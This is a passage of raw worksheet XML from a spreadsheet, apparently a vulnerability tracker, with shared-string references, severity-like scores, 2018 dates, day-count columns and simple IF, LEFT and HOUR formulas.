        <v>153</v>
      </c>
      <c r="B45" s="4" t="s">
        <v>154</v>
      </c>
      <c r="C45" s="4" t="s">
        <v>155</v>
      </c>
      <c r="D45" s="4" t="s">
        <v>156</v>
      </c>
      <c r="E45" s="4" t="s">
        <v>157</v>
      </c>
      <c r="F45" s="4" t="s">
        <v>38</v>
      </c>
      <c r="G45" s="4" t="s">
        <v>39</v>
      </c>
      <c r="H45" s="4">
        <v>6.3</v>
      </c>
      <c r="I45" s="4" t="s">
        <v>40</v>
      </c>
      <c r="J45" s="4" t="s">
        <v>158</v>
      </c>
      <c r="K45" s="4" t="b">
        <v>0</v>
      </c>
      <c r="L45" s="4">
        <f>IF(out!$G45="None",1,0)</f>
        <v>1</v>
      </c>
      <c r="M45" s="5" t="s">
        <v>159</v>
      </c>
      <c r="N45" s="12" t="s">
        <v>160</v>
      </c>
      <c r="O45" s="13" t="str">
        <f t="shared" si="0"/>
        <v>2018-02-25</v>
      </c>
      <c r="P45" s="12" t="s">
        <v>161</v>
      </c>
      <c r="Q45" s="13" t="str">
        <f t="shared" si="1"/>
        <v>2018-05-12</v>
      </c>
      <c r="R45" s="18">
        <f t="shared" si="2"/>
        <v>76</v>
      </c>
      <c r="S45" s="4" t="s">
        <v>162</v>
      </c>
      <c r="T45" s="5" t="s">
        <v>163</v>
      </c>
      <c r="U45" s="4" t="s">
        <v>164</v>
      </c>
      <c r="V45" s="8" t="s">
        <v>165</v>
      </c>
    </row>
    <row r="46" spans="1:22" ht="10" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A46" s="3" t="s">
        <v>179</v>
      </c>
      <c r="B46" s="4" t="s">
        <v>180</v>
      </c>
      <c r="C46" s="4" t="s">
        <v>181</v>
      </c>
      <c r="D46" s="4" t="s">
        <v>182</v>
      </c>
      <c r="E46" s="4" t="s">
        <v>183</v>
      </c>
      <c r="F46" s="4" t="s">
        <v>54</v>
      </c>
      <c r="G46" s="4" t="s">
        <v>55</v>
      </c>
      <c r="H46" s="4">
        <v>8.6</v>
      </c>
      <c r="I46" s="4" t="s">
        <v>25</v>
      </c>
      <c r="J46" s="4" t="s">
        <v>184</v>
      </c>
      <c r="K46" s="4" t="b">
        <v>0</v>
      </c>
      <c r="L46" s="4">
        <f>IF(out!$G46="None",1,0)</f>
        <v>0</v>
      </c>
      <c r="M46" s="5" t="s">
        <v>185</v>
      </c>
      <c r="N46" s="12" t="s">
        <v>186</v>
      </c>
      <c r="O46" s="13" t="str">
        <f t="shared" si="0"/>
        <v>2018-03-03</v>
      </c>
      <c r="P46" s="12" t="s">
        <v>187</v>
      </c>
      <c r="Q46" s="13" t="str">
        <f t="shared" si="1"/>
        <v>2018-05-12</v>
      </c>
      <c r="R46" s="18">
        <f t="shared" si="2"/>
        <v>70</v>
      </c>
      <c r="S46" s="5" t="s">
        <v>188</v>
      </c>
      <c r="T46" s="5" t="s">
        <v>189</v>
      </c>
      <c r="U46" s="4" t="s">
        <v>190</v>
      </c>
      <c r="V46" s="8" t="s">
        <v>191</v>
      </c>
    </row>
    <row r="47" spans="1:22" ht="10" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A47" s="3" t="s">
        <v>80</v>
      </c>
      <c r="B47" s="4" t="s">
        <v>81</v>
      </c>
      <c r="C47" s="4" t="s">
        <v>82</v>
      </c>
      <c r="D47" s="4" t="s">
        <v>83</v>
      </c>
      <c r="E47" s="4" t="s">
        <v>84</v>
      </c>
      <c r="F47" s="4" t="s">
        <v>38</v>
      </c>
      <c r="G47" s="4" t="s">
        <v>39</v>
      </c>
      <c r="H47" s="4">
        <v>9.3000000000000007</v>
      </c>
      <c r="I47" s="4" t="s">
        <v>85</v>
      </c>
      <c r="J47" s="4" t="s">
        <v>86</v>
      </c>
      <c r="K47" s="4" t="b">
        <v>0</v>
      </c>
      <c r="L47" s="4">
        <f>IF(out!$G47="None",1,0)</f>
        <v>1</v>
      </c>
      <c r="M47" s="5" t="s">
        <v>87</v>
      </c>
      <c r="N47" s="12" t="s">
        <v>88</v>
      </c>
      <c r="O47" s="13" t="str">
        <f t="shared" si="0"/>
        <v>2018-04-27</v>
      </c>
      <c r="P47" s="12" t="s">
        <v>89</v>
      </c>
      <c r="Q47" s="13" t="str">
        <f t="shared" si="1"/>
        <v>2018-05-13</v>
      </c>
      <c r="R47" s="18">
        <f t="shared" si="2"/>
        <v>16</v>
      </c>
      <c r="S47" s="4" t="s">
        <v>90</v>
      </c>
      <c r="T47" s="4" t="s">
        <v>91</v>
      </c>
      <c r="U47" s="4" t="s">
        <v>92</v>
      </c>
      <c r="V47" s="7" t="s">
        <v>93</v>
      </c>
    </row>
    <row r="48" spans="1:22" ht="10" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A48" s="3" t="s">
        <v>107</v>
      </c>
      <c r="B48" s="4" t="s">
        <v>108</v>
      </c>
      <c r="C48" s="4" t="s">
        <v>109</v>
      </c>
      <c r="D48" s="4" t="s">
        <v>110</v>
      </c>
      <c r="E48" s="4" t="s">
        <v>111</v>
      </c>
      <c r="F48" s="4" t="s">
        <v>38</v>
      </c>
      <c r="G48" s="4" t="s">
        <v>39</v>
      </c>
      <c r="H48" s="4">
        <v>9.8000000000000007</v>
      </c>
      <c r="I48" s="4" t="s">
        <v>85</v>
      </c>
      <c r="J48" s="4" t="s">
        <v>112</v>
      </c>
      <c r="K48" s="4" t="b">
        <v>0</v>
      </c>
      <c r="L48" s="4">
        <f>IF(out!$G48="None",1,0)</f>
        <v>1</v>
      </c>
      <c r="M48" s="5" t="s">
        <v>113</v>
      </c>
      <c r="N48" s="12" t="s">
        <v>114</v>
      </c>
      <c r="O48" s="13" t="str">
        <f t="shared" si="0"/>
        <v>2018-02-01</v>
      </c>
      <c r="P48" s="12" t="s">
        <v>115</v>
      </c>
      <c r="Q48" s="13" t="str">
        <f>LEFT(P48,10)</f>
        <v>2018-05-19</v>
      </c>
      <c r="R48" s="18">
        <f t="shared" si="2"/>
        <v>107</v>
      </c>
      <c r="S48" s="4"/>
      <c r="T48" s="4" t="s">
        <v>116</v>
      </c>
      <c r="U48" s="4" t="s">
        <v>117</v>
      </c>
      <c r="V48" s="7" t="s">
        <v>118</v>
      </c>
    </row>
    <row r="49" spans="1:22" ht="10" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A49" s="3" t="s">
        <v>119</v>
      </c>
      <c r="B49" s="4" t="s">
        <v>120</v>
      </c>
      <c r="C49" s="4" t="s">
        <v>121</v>
      </c>
      <c r="D49" s="4" t="s">
        <v>122</v>
      </c>
      <c r="E49" s="4" t="s">
        <v>123</v>
      </c>
      <c r="F49" s="4" t="s">
        <v>124</v>
      </c>
      <c r="G49" s="4" t="s">
        <v>125</v>
      </c>
      <c r="H49" s="4">
        <v>7.4</v>
      </c>
      <c r="I49" s="4" t="s">
        <v>25</v>
      </c>
      <c r="J49" s="4" t="s">
        <v>126</v>
      </c>
      <c r="K49" s="4" t="b">
        <v>0</v>
      </c>
      <c r="L49" s="4">
        <f>IF(out!$G49="None",1,0)</f>
        <v>0</v>
      </c>
      <c r="M49" s="5" t="s">
        <v>127</v>
      </c>
      <c r="N49" s="12" t="s">
        <v>128</v>
      </c>
      <c r="O49" s="13" t="str">
        <f t="shared" si="0"/>
        <v>2018-01-19</v>
      </c>
      <c r="P49" s="12" t="s">
        <v>129</v>
      </c>
      <c r="Q49" s="13" t="str">
        <f t="shared" si="1"/>
        <v>2018-05-19</v>
      </c>
      <c r="R49" s="18">
        <f t="shared" si="2"/>
        <v>120</v>
      </c>
      <c r="S49" s="4"/>
      <c r="T49" s="4" t="s">
        <v>130</v>
      </c>
      <c r="U49" s="4" t="s">
        <v>131</v>
      </c>
      <c r="V49" s="7" t="s">
        <v>132</v>
      </c>
    </row>
    <row r="50" spans="1:22" ht="10" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A50" s="3" t="s">
        <v>64</v>
      </c>
      <c r="B50" s="4" t="s">
        <v>65</v>
      </c>
      <c r="C50" s="4" t="s">
        <v>66</v>
      </c>
      <c r="D50" s="4" t="s">
        <v>67</v>
      </c>
      <c r="E50" s="4" t="s">
        <v>68</v>
      </c>
      <c r="F50" s="4" t="s">
        <v>69</v>
      </c>
      <c r="G50" s="4" t="s">
        <v>70</v>
      </c>
      <c r="H50" s="4">
        <v>2.7</v>
      </c>
      <c r="I50" s="4" t="s">
        <v>71</v>
      </c>
      <c r="J50" s="4" t="s">
        <v>72</v>
      </c>
      <c r="K50" s="4" t="b">
        <v>0</v>
      </c>
      <c r="L50" s="4">
        <f>IF(out!$G50="None",1,0)</f>
        <v>0</v>
      </c>
      <c r="M50" s="5" t="s">
        <v>73</v>
      </c>
      <c r="N50" s="12" t="s">
        <v>74</v>
      </c>
      <c r="O50" s="13" t="str">
        <f t="shared" si="0"/>
        <v>2018-02-28</v>
      </c>
      <c r="P50" s="12" t="s">
        <v>75</v>
      </c>
      <c r="Q50" s="13" t="str">
        <f t="shared" si="1"/>
        <v>2018-05-20</v>
      </c>
      <c r="R50" s="18">
        <f t="shared" si="2"/>
        <v>81</v>
      </c>
      <c r="S50" s="4" t="s">
        <v>76</v>
      </c>
      <c r="T50" s="4" t="s">
        <v>77</v>
      </c>
      <c r="U50" s="4" t="s">
        <v>78</v>
      </c>
      <c r="V50" s="7" t="s">
        <v>79</v>
      </c>
    </row>
    <row r="51" spans="1:22" ht="10" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A51" s="3" t="s">
        <v>33</v>
      </c>
      <c r="B51" s="4" t="s">
        <v>34</v>
      </c>
      <c r="C51" s="4" t="s">
        <v>35</v>
      </c>
      <c r="D51" s="4" t="s">
        <v>36</v>
      </c>
      <c r="E51" s="4" t="s">
        <v>37</v>
      </c>
      <c r="F51" s="4" t="s">
        <v>38</v>
      </c>
      <c r="G51" s="4" t="s">
        <v>39</v>
      </c>
      <c r="H51" s="4">
        <v>5.2</v>
      </c>
      <c r="I51" s="4" t="s">
        <v>40</v>
      </c>
      <c r="J51" s="4" t="s">
        <v>41</v>
      </c>
      <c r="K51" s="4" t="b">
        <v>0</v>
      </c>
      <c r="L51" s="4">
        <f>IF(out!$G51="None",1,0)</f>
        <v>1</v>
      </c>
      <c r="M51" s="5" t="s">
        <v>42</v>
      </c>
      <c r="N51" s="12" t="s">
        <v>43</v>
      </c>
      <c r="O51" s="13" t="str">
        <f t="shared" si="0"/>
        <v>2018-03-21</v>
      </c>
      <c r="P51" s="12" t="s">
        <v>44</v>
      </c>
      <c r="Q51" s="13" t="str">
        <f t="shared" si="1"/>
        <v>2018-05-29</v>
      </c>
      <c r="R51" s="18">
        <f t="shared" si="2"/>
        <v>69</v>
      </c>
      <c r="S51" s="4" t="s">
        <v>45</v>
      </c>
      <c r="T51" s="4" t="s">
        <v>46</v>
      </c>
      <c r="U51" s="4" t="s">
        <v>47</v>
      </c>
      <c r="V51" s="7" t="s">
        <v>48</v>
      </c>
    </row>
    <row r="52" spans="1:22" ht="10" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A52" s="3" t="s">
        <v>49</v>
      </c>
      <c r="B52" s="4" t="s">
        <v>50</v>
      </c>
      <c r="C52" s="4" t="s">
        <v>51</v>
      </c>
      <c r="D52" s="4" t="s">
        <v>52</v>
      </c>
      <c r="E52" s="4" t="s">
        <v>53</v>
      </c>
      <c r="F52" s="4" t="s">
        <v>54</v>
      </c>
      <c r="G52" s="4" t="s">
        <v>55</v>
      </c>
      <c r="H52" s="4">
        <v>6.1</v>
      </c>
      <c r="I52" s="4" t="s">
        <v>40</v>
      </c>
      <c r="J52" s="4" t="s">
        <v>56</v>
      </c>
      <c r="K52" s="4" t="b">
        <v>0</v>
      </c>
      <c r="L52" s="4">
        <f>IF(out!$G52="None",1,0)</f>
        <v>0</v>
      </c>
      <c r="M52" s="5" t="s">
        <v>57</v>
      </c>
      <c r="N52" s="12" t="s">
        <v>58</v>
      </c>
      <c r="O52" s="13" t="str">
        <f t="shared" si="0"/>
        <v>2018-04-18</v>
      </c>
      <c r="P52" s="12" t="s">
        <v>59</v>
      </c>
      <c r="Q52" s="13" t="str">
        <f t="shared" si="1"/>
        <v>2018-05-29</v>
      </c>
      <c r="R52" s="18">
        <f t="shared" si="2"/>
        <v>41</v>
      </c>
      <c r="S52" s="5" t="s">
        <v>60</v>
      </c>
      <c r="T52" s="4" t="s">
        <v>61</v>
      </c>
      <c r="U52" s="4" t="s">
        <v>62</v>
      </c>
      <c r="V52" s="7" t="s">
        <v>63</v>
      </c>
    </row>
    <row r="53" spans="1:22" ht="10" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A53" s="3" t="s">
        <v>18</v>
      </c>
      <c r="B53" s="4" t="s">
        <v>19</v>
      </c>
      <c r="C53" s="4" t="s">
        <v>20</v>
      </c>
      <c r="D53" s="4" t="s">
        <v>21</v>
      </c>
      <c r="E53" s="4" t="s">
        <v>22</v>
      </c>
      <c r="F53" s="4" t="s">
        <v>23</v>
      </c>
      <c r="G53" s="4" t="s">
        <v>24</v>
      </c>
      <c r="H53" s="4">
        <v>8.6</v>
      </c>
      <c r="I53" s="4" t="s">
        <v>25</v>
      </c>
      <c r="J53" s="4" t="s">
        <v>26</v>
      </c>
      <c r="K53" s="4" t="b">
        <v>0</v>
      </c>
      <c r="L53" s="4">
        <f>IF(out!$G53="None",1,0)</f>
        <v>0</v>
      </c>
      <c r="M53" s="5" t="s">
        <v>27</v>
      </c>
      <c r="N53" s="12" t="s">
        <v>28</v>
      </c>
      <c r="O53" s="13" t="str">
        <f t="shared" si="0"/>
        <v>2018-03-28</v>
      </c>
      <c r="P53" s="12" t="s">
        <v>29</v>
      </c>
      <c r="Q53" s="13" t="str">
        <f t="shared" si="1"/>
        <v>2018-05-31</v>
      </c>
      <c r="R53" s="18">
        <f t="shared" si="2"/>
        <v>64</v>
      </c>
      <c r="S53" s="4"/>
      <c r="T53" s="4" t="s">
        <v>30</v>
      </c>
      <c r="U53" s="4" t="s">
        <v>31</v>
      </c>
      <c r="V53" s="7" t="s">
        <v>32</v>
      </c>
    </row>
    <row r="54" spans="1:22" ht="10" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A54" s="3"/>
      <c r="B54" s="4" t="s">
        <v>148</v>
      </c>
      <c r="C54" s="4" t="s">
        <v>149</v>
      </c>
      <c r="D54" s="4" t="s">
        <v>150</v>
      </c>
      <c r="E54" s="4" t="s">
        <v>151</v>
      </c>
      <c r="F54" s="4" t="s">
        <v>38</v>
      </c>
      <c r="G54" s="4" t="s">
        <v>39</v>
      </c>
      <c r="H54" s="4">
        <v>10</v>
      </c>
      <c r="I54" s="4" t="s">
        <v>85</v>
      </c>
      <c r="J54" s="4" t="s">
        <v>152</v>
      </c>
      <c r="K54" s="4" t="b">
        <v>1</v>
      </c>
      <c r="L54" s="4">
        <f>IF(out!$G54="None",1,0)</f>
        <v>1</v>
      </c>
      <c r="M54" s="4"/>
      <c r="N54" s="4"/>
      <c r="O54" s="13"/>
      <c r="P54" s="4"/>
      <c r="Q54" s="13">
        <f>HOUR(out!$P54 -out!$N54)</f>
        <v>0</v>
      </c>
      <c r="R54" s="18"/>
      <c r="S54" s="4"/>
      <c r="T54" s="4"/>
      <c r="U54" s="4"/>
      <c r="V54" s="7"/>
    </row>
    <row r="55" spans="1:22" ht="10" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A55" s="3" t="s">
        <v>305</v>
      </c>
      <c r="B55" s="4" t="s">
        <v>306</v>
      </c>
      <c r="C55" s="4" t="s">
        <v>307</v>
      </c>
      <c r="D55" s="4" t="s">
        <v>308</v>
      </c>
      <c r="E55" s="4" t="s">
        <v>309</v>
      </c>
      <c r="F55" s="4" t="s">
        <v>38</v>
      </c>
      <c r="G55" s="4" t="s">
        <v>39</v>
      </c>
      <c r="H55" s="4">
        <v>8.8000000000000007</v>
      </c>
      <c r="I55" s="4" t="s">
        <v>25</v>
      </c>
      <c r="J55" s="4"/>
      <c r="K55" s="4"/>
      <c r="L55" s="4">
        <f>IF(out!$G55="None",1,0)</f>
        <v>1</v>
      </c>
      <c r="M55" s="4"/>
      <c r="N55" s="4"/>
      <c r="O55" s="13"/>
      <c r="P55" s="4"/>
      <c r="Q55" s="13">
        <f>HOUR(out!$P55 -out!$N55)</f>
        <v>0</v>
      </c>
      <c r="R55" s="18"/>
      <c r="S55" s="4"/>
      <c r="T55" s="4"/>
      <c r="U55" s="4"/>
      <c r="V55" s="7"/>
    </row>
    <row r="56" spans="1:22" ht="10" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A56" s="3" t="s">
        <v>305</v>
      </c>
      <c r="B56" s="4" t="s">
        <v>310</v>
      </c>
      <c r="C56" s="4" t="s">
        <v>311</v>
      </c>
      <c r="D56" s="4" t="s">
        <v>312</v>
      </c>
      <c r="E56" s="4" t="s">
        <v>313</v>
      </c>
      <c r="F56" s="4" t="s">
        <v>38</v>
      </c>
      <c r="G56" s="4" t="s">
        <v>39</v>
      </c>
      <c r="H56" s="4">
        <v>8.8000000000000007</v>
      </c>
      <c r="I56" s="4" t="s">
        <v>25</v>
      </c>
      <c r="J56" s="4"/>
      <c r="K56" s="4"/>
      <c r="L56" s="4">
        <f>IF(out!$G56="None",1,0)</f>
        <v>1</v>
      </c>
      <c r="M56" s="4"/>
      <c r="N56" s="4"/>
      <c r="O56" s="13"/>
      <c r="P56" s="4"/>
      <c r="Q56" s="13">
        <f>HOUR(out!$P56 -out!$N56)</f>
        <v>0</v>
      </c>
      <c r="R56" s="18"/>
      <c r="S56" s="4"/>
      <c r="T56" s="4"/>
      <c r="U56" s="4"/>
      <c r="V56" s="7"/>
    </row>
    <row r="57" spans="1:22" ht="10" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A57" s="3" t="s">
        <v>314</v>
      </c>
      <c r="B57" s="4" t="s">
        <v>315</v>
      </c>
      <c r="C57" s="4" t="s">
        <v>316</v>
      </c>
      <c r="D57" s="4" t="s">
        <v>317</v>
      </c>
      <c r="E57" s="4" t="s">
        <v>318</v>
      </c>
      <c r="F57" s="4" t="s">
        <v>38</v>
      </c>
      <c r="G57" s="4" t="s">
        <v>39</v>
      </c>
      <c r="H57" s="4">
        <v>10</v>
      </c>
      <c r="I57" s="4" t="s">
        <v>85</v>
      </c>
      <c r="J57" s="4"/>
      <c r="K57" s="4"/>
      <c r="L57" s="4">
        <f>IF(out!$G57="None",1,0)</f>
        <v>1</v>
      </c>
      <c r="M57" s="4"/>
      <c r="N57" s="4"/>
      <c r="O57" s="13"/>
      <c r="P57" s="4"/>
      <c r="Q57" s="13">
        <f>HOUR(out!$P57 -out!$N57)</f>
        <v>0</v>
      </c>
      <c r="R57" s="18"/>
      <c r="S57" s="4"/>
      <c r="T57" s="4"/>
      <c r="U57" s="4"/>
      <c r="V57" s="7"/>
    </row>
    <row r="58" spans="1:22" ht="10" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A58" s="3" t="s">
        <v>319</v>
      </c>
      <c r="B58" s="4" t="s">
        <v>320</v>
      </c>
      <c r="C58" s="4" t="s">
        <v>321</v>
      </c>
      <c r="D58" s="4" t="s">
        <v>322</v>
      </c>
      <c r="E58" s="4" t="s">
        <v>323</v>
      </c>
      <c r="F58" s="4" t="s">
        <v>324</v>
      </c>
      <c r="G58" s="4" t="s">
        <v>325</v>
      </c>
      <c r="H58" s="4">
        <v>9.1</v>
      </c>
      <c r="I58" s="4" t="s">
        <v>85</v>
      </c>
      <c r="J58" s="4"/>
      <c r="K58" s="4"/>
      <c r="L58" s="4">
        <f>IF(out!$G58="None",1,0)</f>
        <v>0</v>
      </c>
      <c r="M58" s="4"/>
      <c r="N58" s="4"/>
      <c r="O58" s="13"/>
      <c r="P58" s="4"/>
      <c r="Q58" s="13">
        <f>HOUR(out!$P58 -out!$N58)</f>
        <v>0</v>
      </c>
      <c r="R58" s="18"/>
      <c r="S58" s="4"/>
      <c r="T58" s="4"/>
      <c r="U58" s="4"/>
      <c r="V58" s="7"/>
    </row>
    <row r="59" spans="1:22" ht="10" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A59" s="3"/>
      <c r="B59" s="4" t="s">
        <v>326</v>
      </c>
      <c r="C59" s="4" t="s">
        <v>327</v>
      </c>
      <c r="D59" s="4" t="s">
        <v>328</v>
      </c>
      <c r="E59" s="4" t="s">
        <v>329</v>
      </c>
      <c r="F59" s="4" t="s">
        <v>38</v>
      </c>
      <c r="G59" s="4" t="s">
        <v>39</v>
      </c>
      <c r="H59" s="4">
        <v>6.5</v>
      </c>
      <c r="I59" s="4" t="s">
        <v>40</v>
      </c>
      <c r="J59" s="4" t="s">
        <v>330</v>
      </c>
      <c r="K59" s="4" t="b">
        <v>1</v>
      </c>
      <c r="L59" s="4">
        <f>IF(out!$G59="None",1,0)</f>
        <v>1</v>
      </c>
      <c r="M59" s="4"/>
      <c r="N59" s="4"/>
      <c r="O59" s="13"/>
      <c r="P59" s="4"/>
      <c r="Q59" s="13">
        <f>HOUR(out!$P59 -out!$N59)</f>
        <v>0</v>
      </c>
      <c r="R59" s="18"/>
      <c r="S59" s="4"/>
      <c r="T59" s="4"/>
      <c r="U59" s="4"/>
      <c r="V59" s="7"/>
    </row>
    <row r="60" spans="1:22" ht="10" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A60" s="3" t="s">
        <v>475</v>
      </c>
      <c r="B60" s="4" t="s">
        <v>476</v>
      </c>
      <c r="C60" s="4" t="s">
        <v>477</v>
      </c>
      <c r="D60" s="4" t="s">
        <v>478</v>
      </c>
      <c r="E60" s="4" t="s">
        <v>479</v>
      </c>
      <c r="F60" s="4" t="s">
        <v>480</v>
      </c>
      <c r="G60" s="4" t="s">
        <v>125</v>
      </c>
      <c r="H60" s="4">
        <v>8</v>
      </c>
      <c r="I60" s="4" t="s">
        <v>25</v>
      </c>
      <c r="J60" s="4"/>
      <c r="K60" s="4"/>
      <c r="L60" s="4">
        <f>IF(out!$G60="None",1,0)</f>
        <v>0</v>
      </c>
      <c r="M60" s="4"/>
      <c r="N60" s="4"/>
      <c r="O60" s="13"/>
      <c r="P60" s="4"/>
      <c r="Q60" s="13">
        <f>HOUR(out!$P60 -out!$N60)</f>
        <v>0</v>
      </c>
      <c r="R60" s="18"/>
      <c r="S60" s="4"/>
      <c r="T60" s="4"/>
      <c r="U60" s="4"/>
      <c r="V60" s="7"/>
    </row>
    <row r="61" spans="1:22" ht="10" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A61" s="3" t="s">
        <v>481</v>
      </c>
      <c r="B61" s="4" t="s">
        <v>482</v>
      </c>
      <c r="C61" s="4" t="s">
        <v>483</v>
      </c>
      <c r="D61" s="4" t="s">
        <v>484</v>
      </c>
      <c r="E61" s="4" t="s">
        <v>485</v>
      </c>
      <c r="F61" s="4" t="s">
        <v>486</v>
      </c>
      <c r="G61" s="4" t="s">
        <v>487</v>
      </c>
      <c r="H61" s="4">
        <v>8</v>
      </c>
      <c r="I61" s="4" t="s">
        <v>25</v>
      </c>
      <c r="J61" s="4"/>
      <c r="K61" s="4"/>
      <c r="L61" s="4">
        <f>IF(out!$G61="None",1,0)</f>
        <v>0</v>
      </c>
      <c r="M61" s="4"/>
      <c r="N61" s="4"/>
      <c r="O61" s="13"/>
      <c r="P61" s="4"/>
      <c r="Q61" s="13">
        <f>HOUR(out!$P61 -out!$N61)</f>
        <v>0</v>
      </c>
      <c r="R61" s="18"/>
      <c r="S61" s="4"/>
      <c r="T61" s="4"/>
      <c r="U61" s="4"/>
      <c r="V61" s="7"/>
    </row>
    <row r="62" spans="1:22" ht="10" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A62" s="3" t="s">
        <v>475</v>
      </c>
      <c r="B62" s="4" t="s">
        <v>488</v>
      </c>
      <c r="C62" s="4" t="s">
        <v>489</v>
      </c>
      <c r="D62" s="4" t="s">
        <v>490</v>
      </c>
      <c r="E62" s="4" t="s">
        <v>491</v>
      </c>
      <c r="F62" s="4" t="s">
        <v>492</v>
      </c>
      <c r="G62" s="4" t="s">
        <v>493</v>
      </c>
      <c r="H62" s="4"/>
      <c r="I62" s="4"/>
      <c r="J62" s="4"/>
      <c r="K62" s="4"/>
      <c r="L62" s="4">
        <f>IF(out!$G62="None",1,0)</f>
        <v>0</v>
      </c>
      <c r="M62" s="4"/>
      <c r="N62" s="4"/>
      <c r="O62" s="13"/>
      <c r="P62" s="4"/>
      <c r="Q62" s="13">
        <f>HOUR(out!$P62 -out!$N62)</f>
        <v>0</v>
      </c>
      <c r="R62" s="18"/>
      <c r="S62" s="4"/>
      <c r="T62" s="4"/>
      <c r="U62" s="4"/>
      <c r="V62" s="7"/>
    </row>
    <row r="63" spans="1:22" ht="10" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A63" s="3" t="s">
        <v>519</v>
      </c>
      <c r="B63" s="4" t="s">
        <v>520</v>
      </c>
      <c r="C63" s="4" t="s">
        <v>521</v>
      </c>
      <c r="D63" s="4" t="s">
        <v>522</v>
      </c>
      <c r="E63" s="4" t="s">
        <v>523</v>
      </c>
      <c r="F63" s="4" t="s">
        <v>524</v>
      </c>
      <c r="G63" s="4" t="s">
        <v>525</v>
      </c>
      <c r="H63" s="4">
        <v>5</v>
      </c>
      <c r="I63" s="4" t="s">
        <v>40</v>
      </c>
      <c r="J63" s="4"/>
      <c r="K63" s="4"/>
      <c r="L63" s="4">
        <f>IF(out!$G63="None",1,0)</f>
        <v>0</v>
      </c>
      <c r="M63" s="4"/>
      <c r="N63" s="4"/>
      <c r="O63" s="13"/>
      <c r="P63" s="4"/>
      <c r="Q63" s="13">
        <f>HOUR(out!$P63 -out!$N63)</f>
        <v>0</v>
      </c>
      <c r="R63" s="18"/>
      <c r="S63" s="4"/>
      <c r="T63" s="4"/>
      <c r="U63" s="4"/>
      <c r="V63" s="7"/>
    </row>
    <row r="64" spans="1:22" ht="10" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A64" s="3" t="s">
        <v>519</v>
      </c>
      <c r="B64" s="4" t="s">
        <v>526</v>
      </c>
      <c r="C64" s="4" t="s">
        <v>527</v>
      </c>
      <c r="D64" s="4" t="s">
        <v>528</v>
      </c>
      <c r="E64" s="4" t="s">
        <v>529</v>
      </c>
      <c r="F64" s="4" t="s">
        <v>530</v>
      </c>
      <c r="G64" s="4" t="s">
        <v>531</v>
      </c>
      <c r="H64" s="4">
        <v>5</v>
      </c>
      <c r="I64" s="4" t="s">
        <v>40</v>
      </c>
      <c r="J64" s="4"/>
      <c r="K64" s="4"/>
      <c r="L64" s="4">
        <f>IF(out!$G64="None",1,0)</f>
        <v>0</v>
      </c>
      <c r="M64" s="4"/>
      <c r="N64" s="4"/>
      <c r="O64" s="13"/>
      <c r="P64" s="4"/>
      <c r="Q64" s="13">
        <f>HOUR(out!$P64 -out!$N64)</f>
        <v>0</v>
      </c>
      <c r="R64" s="18"/>
      <c r="S64" s="4"/>
      <c r="T64" s="4"/>
      <c r="U64" s="4"/>
      <c r="V64" s="7"/>
    </row>
    <row r="65" spans="1:22" ht="10" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A65" s="3" t="s">
        <v>519</v>
      </c>
      <c r="B65" s="4" t="s">
        <v>532</v>
      </c>
      <c r="C65" s="4" t="s">
        <v>533</v>
      </c>
      <c r="D65" s="4" t="s">
        <v>534</v>
      </c>
      <c r="E65" s="4" t="s">
        <v>535</v>
      </c>
      <c r="F65" s="4" t="s">
        <v>536</v>
      </c>
      <c r="G65" s="4" t="s">
        <v>537</v>
      </c>
      <c r="H65" s="4">
        <v>5</v>
      </c>
      <c r="I65" s="4" t="s">
        <v>40</v>
      </c>
      <c r="J65" s="4"/>
      <c r="K65" s="4"/>
      <c r="L65" s="4">
        <f>IF(out!$G65="None",1,0)</f>
        <v>0</v>
      </c>
      <c r="M65" s="4"/>
      <c r="N65" s="4"/>
      <c r="O65" s="13"/>
      <c r="P65" s="4"/>
      <c r="Q65" s="13">
        <f>HOUR(out!$P65 -out!$N65)</f>
        <v>0</v>
      </c>
      <c r="R65" s="18"/>
      <c r="S65" s="4"/>
      <c r="T65" s="4"/>
      <c r="U65" s="4"/>
      <c r="V65" s="7"/>
    </row>
    <row r="66" spans="1:22" ht="10" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A66" s="3" t="s">
        <v>519</v>
      </c>
      <c r="B66" s="4" t="s">
        <v>538</v>
      </c>
      <c r="C66" s="4" t="s">
        <v>539</v>
      </c>
      <c r="D66" s="4" t="s">
        <v>540</v>
      </c>
      <c r="E66" s="4" t="s">
        <v>541</v>
      </c>
      <c r="F66" s="4" t="s">
        <v>542</v>
      </c>
      <c r="G66" s="4" t="s">
        <v>543</v>
      </c>
      <c r="H66" s="4">
        <v>5</v>
      </c>
      <c r="I66" s="4" t="s">
        <v>40</v>
      </c>
      <c r="J66" s="4"/>
      <c r="K66" s="4"/>
      <c r="L66" s="4">
        <f>IF(out!$G66="None",1,0)</f>
        <v>0</v>
      </c>
      <c r="M66" s="4"/>
      <c r="N66" s="4"/>
      <c r="O66" s="13"/>
      <c r="P66" s="4"/>
      <c r="Q66" s="13">
        <f>HOUR(out!$P66 -out!$N66)</f>
        <v>0</v>
      </c>
      <c r="R66" s="18"/>
      <c r="S66" s="4"/>
      <c r="T66" s="4"/>
      <c r="U66" s="4"/>
      <c r="V66" s="7"/>
    </row>
    <row r="67" spans="1:22" ht="10" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A67" s="3" t="s">
        <v>544</v>
      </c>
      <c r="B67" s="4" t="s">
        <v>545</v>
      </c>
      <c r="C67" s="4" t="s">
        <v>546</v>
      </c>
      <c r="D67" s="4" t="s">
        <v>547</v>
      </c>
      <c r="E67" s="4" t="s">
        <v>548</v>
      </c>
